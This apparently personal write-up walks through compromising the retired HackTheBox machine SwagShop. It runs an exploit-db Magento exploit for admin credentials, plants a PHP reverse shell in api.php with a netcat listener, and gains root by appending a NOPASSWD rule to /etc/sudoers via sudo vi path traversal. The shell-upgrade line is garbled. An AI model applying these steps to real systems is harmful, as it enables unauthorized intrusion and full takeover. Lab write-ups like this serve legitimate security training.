SwagShop is a pretty easy linux box in HackTheBox, by now, it has expired and that's why I am posting this walkthrough. This is also my first successful hack in HTB.
The steps are as follows:
As we don't know anything about the machine yet, we will start by opening it in the browser and then running nmap on it.
nmap -A 10.10.10.140
Now, we would like see what directories or files are in the web server, to do that, we will use drib.
As we surf through the website, we will find that it is based on something called Magento.
Let's google it and find out what it is.
While surfing through the website as you view the page sources, and get the results from drib, check them out and you should find a login panel.
Now, let's google for magento exploits to see if there are any pre written exploits that we can use.
You should find one in exploitdb.
Another way of finding if there is an exploit for something is by using searchsploit. Let's try it in the terminal.
Here, we can see a few exploits, let's check the one with the name 37977.py as it is of type xml and also for remote code execution.
Now, let's copy that script to our present working directory.
cp /usr/share/exploitdb/exploits/xml/webapps/37977.py /HTB/SwagShop/exploit.py
In the script, lets change the url to add
/index.php/ to it.
Now, we can try and run this script.
It should display account credentials as the output, use it to log in to the system.
use the account to log in.
In your Kali machine, you should have a php reverse shell file in,
Copy this reverse shell to your current working directory.
cp /usr/share/webshells/php/php-reverse-shell.php /HTB/SwagShop/shell.php
Open it with the editor of your choice and change the hostname to your hostname and port to 4444.
Now, in the web browser, as you have logged in, in the menu, go to System -> Filesystem.
Open the api.php file and then, add the content of the reverse shell to it.
Now, come back to the terminal and use netcat to listen to any incoming connections to your device on port 4444.
nc -nvlp 4444
Run the .php file, 10.10.10.140/api.php
Now, you should get a reverse shell.
Its time to make the shell better.
Do that by using the following commands:
export TERM=linux python3 -c ‘pty —— shell spawn command
Now, to get the user's flag, read the user.txt file in the user's home directory.
Now, the final step, it's all about privilege escalation.
Let's see if our user has the ability to use the sudo command.
You should see that our user can use sudo with the vi command in the directory /var/www/html.
Let's try accessing the sudoers file from here.
sudo vi /var/www/html/../../../etc/sudoers
Cool, it opens.
Now, go to end and add,
www-data ALL=(ALL) NOPASSWD:ALL
Save and exit. Hit ESC and then,
Now, create a new bash shell using sudo.
Now, all we need to do is read the contents of the root.txt file.
And, that's all! Wasn't that tough, was it?